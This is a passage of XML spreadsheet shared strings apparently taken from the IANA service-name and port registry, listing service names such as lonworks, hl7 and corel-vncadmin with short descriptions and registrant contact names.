    <t>NCR CCL</t>
  </si>
  <si>
    <t>This entry is an alias to "ncr-ccl".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>utsftp</t>
  </si>
  <si>
    <t>UTS FTP</t>
  </si>
  <si>
    <t>[David_Moore]</t>
  </si>
  <si>
    <t>vrcommerce</t>
  </si>
  <si>
    <t>VR Commerce</t>
  </si>
  <si>
    <t>[Yosi_Mass]</t>
  </si>
  <si>
    <t>ito-e-gui</t>
  </si>
  <si>
    <t>ITO-E GUI</t>
  </si>
  <si>
    <t>[Michael_Haeuptle]</t>
  </si>
  <si>
    <t>ovtopmd</t>
  </si>
  <si>
    <t>OVTOPMD</t>
  </si>
  <si>
    <t>snifferserver</t>
  </si>
  <si>
    <t>SnifferServer</t>
  </si>
  <si>
    <t>[Amy_Weaver_3]</t>
  </si>
  <si>
    <t>combox-web-acc</t>
  </si>
  <si>
    <t>Combox Web Access</t>
  </si>
  <si>
    <t>[Yochai_Cohen]</t>
  </si>
  <si>
    <t>madcap</t>
  </si>
  <si>
    <t>MADCAP</t>
  </si>
  <si>
    <t>[Stephen_Hanna_2]</t>
  </si>
  <si>
    <t>btpp2audctr1</t>
  </si>
  <si>
    <t>upgrade</t>
  </si>
  <si>
    <t>Upgrade Protocol</t>
  </si>
  <si>
    <t>[Breck_Auten]</t>
  </si>
  <si>
    <t>vnwk-prapi</t>
  </si>
  <si>
    <t>[John_Hasselkus]</t>
  </si>
  <si>
    <t>vsiadmin</t>
  </si>
  <si>
    <t>VSI Admin</t>
  </si>
  <si>
    <t>lonworks</t>
  </si>
  <si>
    <t>LonWorks</t>
  </si>
  <si>
    <t>lonworks2</t>
  </si>
  <si>
    <t>LonWorks2</t>
  </si>
  <si>
    <t>[Gary_Bartlett]</t>
  </si>
  <si>
    <t>udrawgraph</t>
  </si>
  <si>
    <t>uDraw(Graph)</t>
  </si>
  <si>
    <t>[Bremen]</t>
  </si>
  <si>
    <t>reftek</t>
  </si>
  <si>
    <t>REFTEK</t>
  </si>
  <si>
    <t>[Phil_Davidson]</t>
  </si>
  <si>
    <t>novell-zen</t>
  </si>
  <si>
    <t>Management Daemon Refresh</t>
  </si>
  <si>
    <t>sis-emt</t>
  </si>
  <si>
    <t>[Bill_Crawford]</t>
  </si>
  <si>
    <t>vytalvaultbrtp</t>
  </si>
  <si>
    <t>vytalvaultvsmp</t>
  </si>
  <si>
    <t>vytalvaultpipe</t>
  </si>
  <si>
    <t>[Tim_Boldt]</t>
  </si>
  <si>
    <t>ipass</t>
  </si>
  <si>
    <t>IPASS</t>
  </si>
  <si>
    <t>[Michael_Fischer]</t>
  </si>
  <si>
    <t>ads</t>
  </si>
  <si>
    <t>ADS</t>
  </si>
  <si>
    <t>[Michael_O_Connor]</t>
  </si>
  <si>
    <t>isg-uda-server</t>
  </si>
  <si>
    <t>ISG UDA Server</t>
  </si>
  <si>
    <t>[Dror_Harari]</t>
  </si>
  <si>
    <t>call-logging</t>
  </si>
  <si>
    <t>Call Logging</t>
  </si>
  <si>
    <t>[Dean_Webb]</t>
  </si>
  <si>
    <t>efidiningport</t>
  </si>
  <si>
    <t>[Lynn_Carter]</t>
  </si>
  <si>
    <t>vcnet-link-v10</t>
  </si>
  <si>
    <t>VCnet-Link v10</t>
  </si>
  <si>
    <t>[Csaba_Mate]</t>
  </si>
  <si>
    <t>compaq-wcp</t>
  </si>
  <si>
    <t>Compaq WCP</t>
  </si>
  <si>
    <t>[Ferruccio_Barletta]</t>
  </si>
  <si>
    <t>nicetec-nmsvc</t>
  </si>
  <si>
    <t>nicetec-mgmt</t>
  </si>
  <si>
    <t>[Joerg_Paulus]</t>
  </si>
  <si>
    <t>pclemultimedia</t>
  </si>
  <si>
    <t>PCLE Multi Media</t>
  </si>
  <si>
    <t>[Jacob_Gsoedl]</t>
  </si>
  <si>
    <t>lstp</t>
  </si>
  <si>
    <t>LSTP</t>
  </si>
  <si>
    <t>[Waiki_Wright]</t>
  </si>
  <si>
    <t>labrat</t>
  </si>
  <si>
    <t>[John_Harvey]</t>
  </si>
  <si>
    <t>mosaixcc</t>
  </si>
  <si>
    <t>MosaixCC</t>
  </si>
  <si>
    <t>[Steven_Frare]</t>
  </si>
  <si>
    <t>delibo</t>
  </si>
  <si>
    <t>Delibo</t>
  </si>
  <si>
    <t>[NovaWiz_LTD]</t>
  </si>
  <si>
    <t>cti-redwood</t>
  </si>
  <si>
    <t>CTI Redwood</t>
  </si>
  <si>
    <t>[Songwon_Chi]</t>
  </si>
  <si>
    <t>hp-3000-telnet</t>
  </si>
  <si>
    <t>HP 3000 NS/VT block mode telnet</t>
  </si>
  <si>
    <t>coord-svr</t>
  </si>
  <si>
    <t>Coordinator Server</t>
  </si>
  <si>
    <t>[Richard_Steiger]</t>
  </si>
  <si>
    <t>pcs-pcw</t>
  </si>
  <si>
    <t>[W_Jordan_Fitzhugh]</t>
  </si>
  <si>
    <t>clp</t>
  </si>
  <si>
    <t>Cisco Line Protocol</t>
  </si>
  <si>
    <t>[Susan_Hinrichs]</t>
  </si>
  <si>
    <t>spamtrap</t>
  </si>
  <si>
    <t>SPAM TRAP</t>
  </si>
  <si>
    <t>sonuscallsig</t>
  </si>
  <si>
    <t>Sonus Call Signal</t>
  </si>
  <si>
    <t>[Mark_Garti]</t>
  </si>
  <si>
    <t>hs-port</t>
  </si>
  <si>
    <t>HS Port</t>
  </si>
  <si>
    <t>[Uri_Doron]</t>
  </si>
  <si>
    <t>cecsvc</t>
  </si>
  <si>
    <t>CECSVC</t>
  </si>
  <si>
    <t>[Roger_Pao]</t>
  </si>
  <si>
    <t>ibp</t>
  </si>
  <si>
    <t>IBP</t>
  </si>
  <si>
    <t>[Jonathan_Downes]</t>
  </si>
  <si>
    <t>trustestablish</t>
  </si>
  <si>
    <t>Trust Establish</t>
  </si>
  <si>
    <t>blockade-bpsp</t>
  </si>
  <si>
    <t>Blockade BPSP</t>
  </si>
  <si>
    <t>[Blockade]</t>
  </si>
  <si>
    <t>hl7</t>
  </si>
  <si>
    <t>HL7</t>
  </si>
  <si>
    <t>[Tim_Jacobs]</t>
  </si>
  <si>
    <t>tclprodebugger</t>
  </si>
  <si>
    <t>TCL Pro Debugger</t>
  </si>
  <si>
    <t>scipticslsrvr</t>
  </si>
  <si>
    <t>Scriptics Lsrvr</t>
  </si>
  <si>
    <t>[Brent_Welch]</t>
  </si>
  <si>
    <t>rvs-isdn-dcp</t>
  </si>
  <si>
    <t>RVS ISDN DCP</t>
  </si>
  <si>
    <t>[Michael_Zirpel]</t>
  </si>
  <si>
    <t>mpfoncl</t>
  </si>
  <si>
    <t>[Itaru_Kimura]</t>
  </si>
  <si>
    <t>tributary</t>
  </si>
  <si>
    <t>Tributary</t>
  </si>
  <si>
    <t>[Louis_Lu]</t>
  </si>
  <si>
    <t>argis-te</t>
  </si>
  <si>
    <t>ARGIS TE</t>
  </si>
  <si>
    <t>argis-ds</t>
  </si>
  <si>
    <t>ARGIS DS</t>
  </si>
  <si>
    <t>[John_Legh_Page]</t>
  </si>
  <si>
    <t>mon</t>
  </si>
  <si>
    <t>MON</t>
  </si>
  <si>
    <t>[Jim_Trocki]</t>
  </si>
  <si>
    <t>cyaserv</t>
  </si>
  <si>
    <t>[Morgan_Jones]</t>
  </si>
  <si>
    <t>netx-server</t>
  </si>
  <si>
    <t>NETX Server</t>
  </si>
  <si>
    <t>netx-agent</t>
  </si>
  <si>
    <t>NETX Agent</t>
  </si>
  <si>
    <t>[Brett_Dolecheck]</t>
  </si>
  <si>
    <t>masc</t>
  </si>
  <si>
    <t>MASC</t>
  </si>
  <si>
    <t>[Pavlin_Ivanov_Radosl]</t>
  </si>
  <si>
    <t>privilege</t>
  </si>
  <si>
    <t>Privilege</t>
  </si>
  <si>
    <t>[Gil_Hecht]</t>
  </si>
  <si>
    <t>quartus-tcl</t>
  </si>
  <si>
    <t>quartus tcl</t>
  </si>
  <si>
    <t>[Subroto_Datta]</t>
  </si>
  <si>
    <t>idotdist</t>
  </si>
  <si>
    <t>[Jason_Hunter]</t>
  </si>
  <si>
    <t>maytagshuffle</t>
  </si>
  <si>
    <t>Maytag Shuffle</t>
  </si>
  <si>
    <t>netrek</t>
  </si>
  <si>
    <t>[Al_Guetzlaff]</t>
  </si>
  <si>
    <t>mns-mail</t>
  </si>
  <si>
    <t>MNS Mail Notice Service</t>
  </si>
  <si>
    <t>[Rumiko_Kikuta]</t>
  </si>
  <si>
    <t>dts</t>
  </si>
  <si>
    <t>Data Base Server</t>
  </si>
  <si>
    <t>[Andreas_Roene]</t>
  </si>
  <si>
    <t>worldfusion1</t>
  </si>
  <si>
    <t>World Fusion 1</t>
  </si>
  <si>
    <t>worldfusion2</t>
  </si>
  <si>
    <t>World Fusion 2</t>
  </si>
  <si>
    <t>[World_Fusion]</t>
  </si>
  <si>
    <t>homesteadglory</t>
  </si>
  <si>
    <t>Homestead Glory</t>
  </si>
  <si>
    <t>[John_Tokash]</t>
  </si>
  <si>
    <t>citriximaclient</t>
  </si>
  <si>
    <t>Citrix MA Client</t>
  </si>
  <si>
    <t>snapd</t>
  </si>
  <si>
    <t>Snap Discovery</t>
  </si>
  <si>
    <t>[Kevin_Osborn]</t>
  </si>
  <si>
    <t>hpstgmgr</t>
  </si>
  <si>
    <t>HPSTGMGR</t>
  </si>
  <si>
    <t>[Kevin_Collins]</t>
  </si>
  <si>
    <t>discp-client</t>
  </si>
  <si>
    <t>discp client</t>
  </si>
  <si>
    <t>discp-server</t>
  </si>
  <si>
    <t>discp server</t>
  </si>
  <si>
    <t>servicemeter</t>
  </si>
  <si>
    <t>Service Meter</t>
  </si>
  <si>
    <t>[Duncan_Hare]</t>
  </si>
  <si>
    <t>nsc-ccs</t>
  </si>
  <si>
    <t>NSC CCS</t>
  </si>
  <si>
    <t>nsc-posa</t>
  </si>
  <si>
    <t>NSC POSA</t>
  </si>
  <si>
    <t>[Tom_Findley]</t>
  </si>
  <si>
    <t>netmon</t>
  </si>
  <si>
    <t>Dell Netmon</t>
  </si>
  <si>
    <t>connection</t>
  </si>
  <si>
    <t>Dell Connection</t>
  </si>
  <si>
    <t>[Sudhir_Shetty]</t>
  </si>
  <si>
    <t>wag-service</t>
  </si>
  <si>
    <t>Wag Service</t>
  </si>
  <si>
    <t>[Gilles_Bourquard]</t>
  </si>
  <si>
    <t>system-monitor</t>
  </si>
  <si>
    <t>System Monitor</t>
  </si>
  <si>
    <t>[Greg_Robson_Garth]</t>
  </si>
  <si>
    <t>versa-tek</t>
  </si>
  <si>
    <t>VersaTek</t>
  </si>
  <si>
    <t>[James_Kou]</t>
  </si>
  <si>
    <t>lionhead</t>
  </si>
  <si>
    <t>LIONHEAD</t>
  </si>
  <si>
    <t>[Tim_Rance]</t>
  </si>
  <si>
    <t>qpasa-agent</t>
  </si>
  <si>
    <t>Qpasa Agent</t>
  </si>
  <si>
    <t>[Craig_Ching]</t>
  </si>
  <si>
    <t>smntubootstrap</t>
  </si>
  <si>
    <t>SMNTUBootstrap</t>
  </si>
  <si>
    <t>[Matt_Cecile]</t>
  </si>
  <si>
    <t>neveroffline</t>
  </si>
  <si>
    <t>Never Offline</t>
  </si>
  <si>
    <t>[Dustin_Brand]</t>
  </si>
  <si>
    <t>firepower</t>
  </si>
  <si>
    <t>[Jason_Volk]</t>
  </si>
  <si>
    <t>appswitch-emp</t>
  </si>
  <si>
    <t>[Ted_Ross]</t>
  </si>
  <si>
    <t>cmadmin</t>
  </si>
  <si>
    <t>Clinical Context Managers</t>
  </si>
  <si>
    <t>priority-e-com</t>
  </si>
  <si>
    <t>Priority E-Com</t>
  </si>
  <si>
    <t>[Marcelo_Einhorn_2]</t>
  </si>
  <si>
    <t>bruce</t>
  </si>
  <si>
    <t>[Alec_Muffett]</t>
  </si>
  <si>
    <t>lpsrecommender</t>
  </si>
  <si>
    <t>LPSRecommender</t>
  </si>
  <si>
    <t>[Pritham_Shetty_2]</t>
  </si>
  <si>
    <t>miles-apart</t>
  </si>
  <si>
    <t>Miles Apart Jukebox Server</t>
  </si>
  <si>
    <t>[Michael_Rathmann]</t>
  </si>
  <si>
    <t>metricadbc</t>
  </si>
  <si>
    <t>MetricaDBC</t>
  </si>
  <si>
    <t>[Russ_Olivant]</t>
  </si>
  <si>
    <t>lmdp</t>
  </si>
  <si>
    <t>LMDP</t>
  </si>
  <si>
    <t>[Ken_Bailey]</t>
  </si>
  <si>
    <t>aria</t>
  </si>
  <si>
    <t>Aria</t>
  </si>
  <si>
    <t>[Logan_Bruns]</t>
  </si>
  <si>
    <t>blwnkl-port</t>
  </si>
  <si>
    <t>Blwnkl Port</t>
  </si>
  <si>
    <t>[Weng_Chin_Yung]</t>
  </si>
  <si>
    <t>gbjd816</t>
  </si>
  <si>
    <t>[George_Balesta]</t>
  </si>
  <si>
    <t>moshebeeri</t>
  </si>
  <si>
    <t>Moshe Beeri</t>
  </si>
  <si>
    <t>[Moshe_Beeri]</t>
  </si>
  <si>
    <t>dict</t>
  </si>
  <si>
    <t>DICT</t>
  </si>
  <si>
    <t>[Rik_Faith]</t>
  </si>
  <si>
    <t>sitaraserver</t>
  </si>
  <si>
    <t>Sitara Server</t>
  </si>
  <si>
    <t>sitaramgmt</t>
  </si>
  <si>
    <t>Sitara Management</t>
  </si>
  <si>
    <t>sitaradir</t>
  </si>
  <si>
    <t>Sitara Dir</t>
  </si>
  <si>
    <t>[Manickam_R_Sridhar]</t>
  </si>
  <si>
    <t>irdg-post</t>
  </si>
  <si>
    <t>IRdg Post</t>
  </si>
  <si>
    <t>[IRdg]</t>
  </si>
  <si>
    <t>interintelli</t>
  </si>
  <si>
    <t>InterIntelli</t>
  </si>
  <si>
    <t>[Mike_Gagle]</t>
  </si>
  <si>
    <t>pk-electronics</t>
  </si>
  <si>
    <t>PK Electronics</t>
  </si>
  <si>
    <t>[Seb_Ibis]</t>
  </si>
  <si>
    <t>backburner</t>
  </si>
  <si>
    <t>Back Burner</t>
  </si>
  <si>
    <t>[Kevin_Teiskoetter]</t>
  </si>
  <si>
    <t>solve</t>
  </si>
  <si>
    <t>Solve</t>
  </si>
  <si>
    <t>[Peter_Morrison]</t>
  </si>
  <si>
    <t>imdocsvc</t>
  </si>
  <si>
    <t>Import Document Service</t>
  </si>
  <si>
    <t>[Zia_Bhatti]</t>
  </si>
  <si>
    <t>sybaseanywhere</t>
  </si>
  <si>
    <t>Sybase Anywhere</t>
  </si>
  <si>
    <t>aminet</t>
  </si>
  <si>
    <t>AMInet</t>
  </si>
  <si>
    <t>[Alcorn_McBride_Inc]</t>
  </si>
  <si>
    <t>ami-control</t>
  </si>
  <si>
    <t>Alcorn McBride Inc protocol used for device control</t>
  </si>
  <si>
    <t>hdl-srv</t>
  </si>
  <si>
    <t>HDL Server</t>
  </si>
  <si>
    <t>[David_Ely]</t>
  </si>
  <si>
    <t>tragic</t>
  </si>
  <si>
    <t>Tragic</t>
  </si>
  <si>
    <t>gte-samp</t>
  </si>
  <si>
    <t>GTE-SAMP</t>
  </si>
  <si>
    <t>[Asher_Altman]</t>
  </si>
  <si>
    <t>travsoft-ipx-t</t>
  </si>
  <si>
    <t>Travsoft IPX Tunnel</t>
  </si>
  <si>
    <t>[Jack_Wilson]</t>
  </si>
  <si>
    <t>novell-ipx-cmd</t>
  </si>
  <si>
    <t>Novell IPX CMD</t>
  </si>
  <si>
    <t>[Juan_Carlos_Luciani]</t>
  </si>
  <si>
    <t>and-lm</t>
  </si>
  <si>
    <t>AND License Manager</t>
  </si>
  <si>
    <t>[Dick_van_der_Sijs]</t>
  </si>
  <si>
    <t>syncserver</t>
  </si>
  <si>
    <t>SyncServer</t>
  </si>
  <si>
    <t>[Shawn_Casey]</t>
  </si>
  <si>
    <t>upsnotifyprot</t>
  </si>
  <si>
    <t>Upsnotifyprot</t>
  </si>
  <si>
    <t>[Mario_Leboute]</t>
  </si>
  <si>
    <t>vpsipport</t>
  </si>
  <si>
    <t>VPSIPPORT</t>
  </si>
  <si>
    <t>[Joon_Radley]</t>
  </si>
  <si>
    <t>eristwoguns</t>
  </si>
  <si>
    <t>[Jason_Lockett][Melanie_Kacerek]</t>
  </si>
  <si>
    <t>ebinsite</t>
  </si>
  <si>
    <t>EBInSite</t>
  </si>
  <si>
    <t>[Lefteris_Kalamaras]</t>
  </si>
  <si>
    <t>interpathpanel</t>
  </si>
  <si>
    <t>InterPathPanel</t>
  </si>
  <si>
    <t>[Stephen_Misel]</t>
  </si>
  <si>
    <t>sonus</t>
  </si>
  <si>
    <t>Sonus</t>
  </si>
  <si>
    <t>corel-vncadmin</t>
  </si>
  <si>
    <t>Corel VNC Admin
IANA assigned this well-formed service name as a replacement for "corel_vncadmin".</t>
  </si>
  <si>
    <t>[Oleg_Noskov]</t>
  </si>
  <si>
    <t>corel_vncadmin</t>
  </si>
  <si>
    <t>Corel VNC Admin</t>
  </si>
  <si>
    <t>This entry is an alias to "corel-vncadmin".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>unglue</t>
  </si>
  <si>
    <t>UNIX Nt Glue</t>
  </si>
  <si>
    <t>[Peter_Santoro]</t>
  </si>
  <si>
    <t>kana</t>
  </si>
  <si>
    <t>Kana</t>
  </si>
  <si>
    <t>[Colin_Goldstein]</t>
  </si>
  <si>
    <t>sns-dispatcher</t>
  </si>
  <si>
    <t>SNS Dispatcher</t>
  </si>
  <si>
    <t>sns-admin</t>
  </si>
  <si>
    <t>SNS Admin</t>
  </si>
  <si>
    <t>sns-query</t>
  </si>
  <si>
    <t>SNS Query</t>
  </si>
  <si>
    <t>[Mary_Holstege]</t>
  </si>
  <si>
    <t>gcmonitor</t>
  </si>
  <si>
    <t>GC Monitor</t>
  </si>
  <si>
    <t>[Gustavo_Rodriguez_Ri]</t>
  </si>
  <si>
    <t>olhost</t>
  </si>
  <si>
    <t>OLHOST</t>
  </si>
  <si>
    <t>[Robert_Ripberger]</t>
  </si>
  <si>
    <t>bintec-capi</t>
  </si>
  <si>
    <t>BinTec-CAPI</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 2662</t>
  </si>
  <si>
    <t>bintec-tapi</t>
  </si>
  <si>
    <t>BinTec-TAPI</t>
  </si>
  <si>
    <t>patrol-mq-gm</t>
  </si>
  <si>
    <t>Patrol for MQ GM</t>
  </si>
  <si>
    <t>patrol-mq-nm</t>
  </si>
  <si>
    <t>Patrol for MQ NM</t>
  </si>
  <si>
    <t>extensis</t>
  </si>
  <si>
    <t>[Milton_Sagen]</t>
  </si>
  <si>
    <t>alarm-clock-s</t>
  </si>
  <si>
    <t>Alarm Clock Server</t>
  </si>
  <si>
    <t>alarm-clock-c</t>
  </si>
  <si>
    <t>Alarm Clock Client</t>
  </si>
  <si>
    <t>toad</t>
  </si>
  <si>
    <t>TOAD</t>
  </si>
  <si>
    <t>[Michael_Marking]</t>
  </si>
  <si>
    <t>tve-announce</t>
  </si>
  <si>
    <t>TVE Announce</t>
  </si>
  <si>
    <t>[Dean_Blackketter]</t>
  </si>
  <si>
    <t>newlixreg</t>
  </si>
  <si>
    <t>[Jean_Serge_Gagnon_2]</t>
  </si>
  <si>
    <t>nhserver</t>
  </si>
  <si>
    <t>firstcall42</t>
  </si>
  <si>
    <t>First Call 42</t>
  </si>
  <si>
    <t>[Luke_Bowen]</t>
  </si>
  <si>
    <t>ewnn</t>
  </si>
  <si>
    <t>[Yasunari_Yamashita]</t>
  </si>
  <si>
    <t>ttc-etap</t>
  </si>
  <si>
    <t>TTC ETAP</t>
  </si>
  <si>
    <t>[Daniel_Becker]</t>
  </si>
  <si>
    <t>simslink</t>
  </si>
  <si>
    <t>SIMSLink</t>
  </si>
  <si>
    <t>gadgetgate1way</t>
  </si>
  <si>
    <t>Gadget Gate 1 Way</t>
  </si>
  <si>
    <t>gadgetgate2way</t>
  </si>
  <si>
    <t>Gadget Gate 2 Way</t>
  </si>
  <si>
    <t>[Matt_Rollins]</t>
  </si>
  <si>
    <t>syncserverssl</t>
  </si>
  <si>
    <t>Sync Server SSL</t>
  </si>
  <si>
    <t>pxc-sapxom</t>
  </si>
  <si>
    <t>[Hideki_Kiriyama]</t>
  </si>
  <si>
    <t>mpnjsomb</t>
  </si>
  <si>
    <t>ncdloadbalance</t>
  </si>
  <si>
    <t>NCDLoadBalance</t>
  </si>
  <si>
    <t>[Tim_Stevenson]</t>
  </si>
  <si>
    <t>mpnjsosv</t>
  </si>
  <si>
    <t>mpnjsocl</t>
  </si>
  <si>
    <t>mpnjsomg</t>
  </si>
  <si>
    <t>pq-lic-mgmt</t>
  </si>
  <si>
    <t>[Bob_Sledge]</t>
  </si>
  <si>
    <t>md-cg-http</t>
  </si>
  <si>
    <t>md-cf-http</t>
  </si>
  <si>
    <t>[Lyndon_Nerenberg]</t>
  </si>
  <si>
    <t>fastlynx</t>
  </si>
  <si>
    <t>FastLynx</t>
  </si>
  <si>
    <t>[Dave_Sewell]</t>
  </si>
  <si>
    <t>hp-nnm-data</t>
  </si>
  <si>
    <t>HP NNM Embedded Database</t>
  </si>
  <si>
    <t>[Chris_Das]</t>
  </si>
  <si>
    <t>itinternet</t>
  </si>
  <si>
    <t>ITInternet ISM Server</t>
  </si>
  <si>
    <t>[Ron_Ehli]</t>
  </si>
  <si>
    <t>admins-lms</t>
  </si>
  <si>
    <t>Admins LMS</t>
  </si>
  <si>
    <t>[Dagfinn_Saether]</t>
  </si>
  <si>
    <t>(Removed 2004-2-6)</t>
  </si>
  <si>
    <t>pwrsevent</t>
  </si>
  <si>
    <t>[Yoshinobu_Nakamura]</t>
  </si>
  <si>
    <t>vspread</t>
  </si>
  <si>
    <t>VSPREAD</t>
  </si>
  <si>
    <t>[Sumitake_kobayashi]</t>
  </si>
  <si>
    <t>unifyadmin</t>
  </si>
  <si>
    <t>Unify Admin</t>
  </si>
  <si>
    <t>oce-snmp-trap</t>
  </si>
  <si>
    <t>Oce SNMP Trap Port</t>
  </si>
  <si>
    <t>[Peter_Teeuwen]</t>
  </si>
  <si>
    <t>mck-ivpip</t>
  </si>
  <si>
    <t>MCK-IVPIP</t>
  </si>
  <si>
    <t>[Robert_Vincent]</t>
  </si>
  <si>
    <t>csoft-plusclnt</t>
  </si>
  <si>
    <t>Csoft Plus Client</t>
  </si>
  <si>
    <t>[Nedelcho_Stanev]</t>
  </si>
  <si>
    <t>tqdata</t>
  </si>
  <si>
    <t>sms-rcinfo</t>
  </si>
  <si>
    <t>SMS RCINFO</t>
  </si>
  <si>
    <t>sms-xfer</t>
  </si>
  <si>
    <t>SMS XFER</t>
  </si>
  <si>
    <t>sms-chat</t>
  </si>
  <si>
    <t>SMS CHAT</t>
  </si>
  <si>
    <t>sms-remctrl</t>
  </si>
  <si>
    <t>SMS REMCTRL</t>
  </si>
  <si>
    <t>[Tom_Friend]</t>
  </si>
  <si>
    <t>sds-admin</t>
  </si>
  <si>
    <t>SDS Admin</t>
  </si>
  <si>
    <t>[Don_Traub]</t>
  </si>
  <si>
    <t>ncdmirroring</t>
  </si>
  <si>
    <t>NCD Mirroring</t>
  </si>
  <si>
    <t>emcsymapiport</t>
  </si>
  <si>
    <t>EMCSYMAPIPORT</t>
  </si>
  <si>
    <t>[Bruce_Ferjulian]</t>
  </si>
  <si>
    <t>banyan-net</t>
  </si>
  <si>
    <t>Banyan-Net</t>
  </si>
  <si>
    <t>[R_Thirumurthy]</t>
  </si>
  <si>
    <t>supermon</t>
  </si>
  <si>
    <t>Supermon</t>
  </si>
  <si>
    <t>[Ron_Minnich]</t>
  </si>
  <si>
    <t>sso-service</t>
  </si>
  <si>
    <t>SSO Service</t>
  </si>
  <si>
    <t>sso-control</t>
  </si>
  <si>
    <t>SSO Control</t>
  </si>
  <si>
    <t>[Axel_Kern]</t>
  </si>
  <si>
    <t>aocp</t>
  </si>
  <si>
    <t>Axapta Object Communication Protocol</t>
  </si>
  <si>
    <t>[Jakob_Steen_Hansen]</t>
  </si>
  <si>
    <t>raventbs</t>
  </si>
  <si>
    <t>Raven Trinity Broker Service</t>
  </si>
  <si>
    <t>raventdm</t>
  </si>
  <si>
    <t>Raven Trinity Data Mover</t>
  </si>
  <si>
    <t>[Daniel_Sorlov]</t>
  </si>
  <si>
    <t>hpstgmgr2</t>
  </si>
  <si>
    <t>HPSTGMGR2</t>
  </si>
  <si>
    <t>[Kevin_Collins_2]</t>
  </si>
  <si>
    <t>inova-ip-disco</t>
  </si>
  <si>
    <t>Inova IP Disco</t>
  </si>
  <si>
    <t>[Chris_Koeritz]</t>
  </si>
  <si>
    <t>pn-requester</t>
  </si>
  <si>
    <t>PN REQUESTER</t>
  </si>
  <si>
    <t>pn-requester2</t>
  </si>
  <si>
    <t>PN REQUESTER 2</t>
  </si>
  <si>
    <t>scan-change</t>
  </si>
  <si>
    <t>Scan &amp; Change</t>
  </si>
  <si>
    <t>[Alexander_Raji]</t>
  </si>
  <si>
    <t>wkars</t>
  </si>
  <si>
    <t>[Barry_Shelton]</t>
  </si>
  <si>
    <t>smart-diagnose</t>
  </si>
  <si>
    <t>Smart Diagnose</t>
  </si>
  <si>
    <t>[Geoffry_Meek]</t>
  </si>
  <si>
    <t>proactivesrvr</t>
  </si>
  <si>
    <t>Proactive Server</t>
  </si>
  <si>
    <t>[Dalit_Naor]</t>
  </si>
  <si>
    <t>watchdog-nt</t>
  </si>
  <si>
    <t>WatchDog NT Protocol</t>
  </si>
  <si>
    <t>[Glen_Sansoucie]</t>
  </si>
  <si>
    <t>qotps</t>
  </si>
  <si>
    <t>[Piotr_Parlewicz]</t>
  </si>
  <si>
    <t>msolap-ptp2</t>
  </si>
  <si>
    <t>MSOLAP PTP2</t>
  </si>
  <si>
    <t>[Cristian_Petculescu]</t>
  </si>
  <si>
    <t>tams</t>
  </si>
  <si>
    <t>TAMS</t>
  </si>
  <si>
    <t>[David_Leinbach]</t>
  </si>
  <si>
    <t>mgcp-callagent</t>
  </si>
  <si>
    <t>Media Gateway Control Protocol Call Agent</t>
  </si>
  <si>
    <t>sqdr</t>
  </si>
  <si>
    <t>SQDR</t>
  </si>
  <si>
    <t>[Matthew_Orzen]</t>
  </si>
  <si>
    <t>tcim-control</t>
  </si>
  <si>
    <t>TCIM Control</t>
  </si>
  <si>
    <t>[Dean_Skelton]</t>
  </si>
  <si>
    <t>nec-raidplus</t>
  </si>
  <si>
    <t>NEC RaidPlus</t>
  </si>
  <si>
    <t>[Yusuke_Asai]</t>
  </si>
  <si>
    <t>fyre-messanger</t>
  </si>
  <si>
    <t>Fyre Messanger</t>
  </si>
  <si>
    <t>[Robert_Waters]</t>
  </si>
  <si>
    <t>g5m</t>
  </si>
  <si>
    <t>G5M</t>
  </si>
  <si>
    <t>[Graham_Klyne]</t>
  </si>
  <si>
    <t>signet-ctf</t>
  </si>
  <si>
    <t>Signet CTF</t>
  </si>
  <si>
    <t>[Greg_Broiles]</t>
  </si>
  <si>
    <t>ccs-software</t>
  </si>
  <si>
    <t>CCS Software</t>
  </si>
  <si>
    <t>[Bertus_Jacobs]</t>
  </si>
  <si>
    <t>netiq-mc</t>
  </si>
  <si>
    <t>NetIQ Monitor Console</t>
  </si>
  <si>
    <t>[Scott_Southard]</t>
  </si>
  <si>
    <t>radwiz-nms-srv</t>
  </si>
  <si>
    <t>RADWIZ NMS SRV</t>
  </si>
  <si>
    <t>[Israel_Shainert]</t>
  </si>
  <si>
    <t>srp-feedback</t>
  </si>
  <si>
    <t>SRP Feedback</t>
  </si>
  <si>
    <t>[Werner_Almesberger]</t>
  </si>
  <si>
    <t>ndl-tcp-ois-gw</t>
  </si>
  <si>
    <t>NDL TCP-OSI Gateway</t>
  </si>
  <si>
    <t>tn-timing</t>
  </si>
  <si>
    <t>TN Timing</t>
  </si>
  <si>
    <t>[Paul_Roberts]</t>
  </si>
  <si>
    <t>alarm</t>
  </si>
  <si>
    <t>Alarm</t>
  </si>
  <si>
    <t>[Uriy_Makasjuk]</t>
  </si>
  <si>
    <t>tsb</t>
  </si>
  <si>
    <t>TSB</t>
  </si>
  <si>
    <t>tsb2</t>
  </si>
  <si>
    <t>TSB2</t>
  </si>
  <si>
    <t>[Ashish_Chatterjee]</t>
  </si>
  <si>
    <t>murx</t>
  </si>
  <si>
    <t>[Thomas_Kuiper]</t>
  </si>
  <si>
    <t>honyaku</t>
  </si>
  <si>
    <t>urbisnet</t>
  </si>
  <si>
    <t>URBISNET</t>
  </si>
  <si>
    <t>[Urbis_Net_Ltd]</t>
  </si>
  <si>
    <t>cpudpencap</t>
  </si>
  <si>
    <t>CPUDPENCAP</t>
  </si>
  <si>
    <t>[Tamir_Zegman]</t>
  </si>
  <si>
    <t>fjippol-swrly</t>
  </si>
  <si>
    <t>fjippol-polsvr</t>
  </si>
  <si>
    <t>fjippol-cnsl</t>
  </si>
  <si>
    <t>fjippol-port1</t>
  </si>
  <si>
    <t>fjippol-port2</t>
  </si>
  <si>
    <t>[Shoichi_Tachibana]</t>
  </si>
  <si>
    <t>rsisysaccess</t>
  </si>
  <si>
    <t>RSISYS ACCESS</t>
  </si>
  <si>
    <t>[Christophe_Besant]</t>
  </si>
  <si>
    <t>de-spot</t>
  </si>
  <si>
    <t>[Sanjay_Parekh]</t>
  </si>
  <si>
    <t>apollo-cc</t>
  </si>
  <si>
    <t>APOLLO CC</t>
  </si>
  <si>
    <t>[Brand_Communications]</t>
  </si>
  <si>
    <t>expresspay</t>
  </si>
  <si>
    <t>Express Pay</t>
  </si>
  <si>
    <t>[Ben_Higgins]</t>
  </si>
  <si>
    <t>simplement-tie</t>
  </si>
  <si>
    <t>[Tzvika_Chumash]</t>
  </si>
  <si>
    <t>cnrp</t>
  </si>
  <si>
    <t>CNRP</t>
  </si>
  <si>
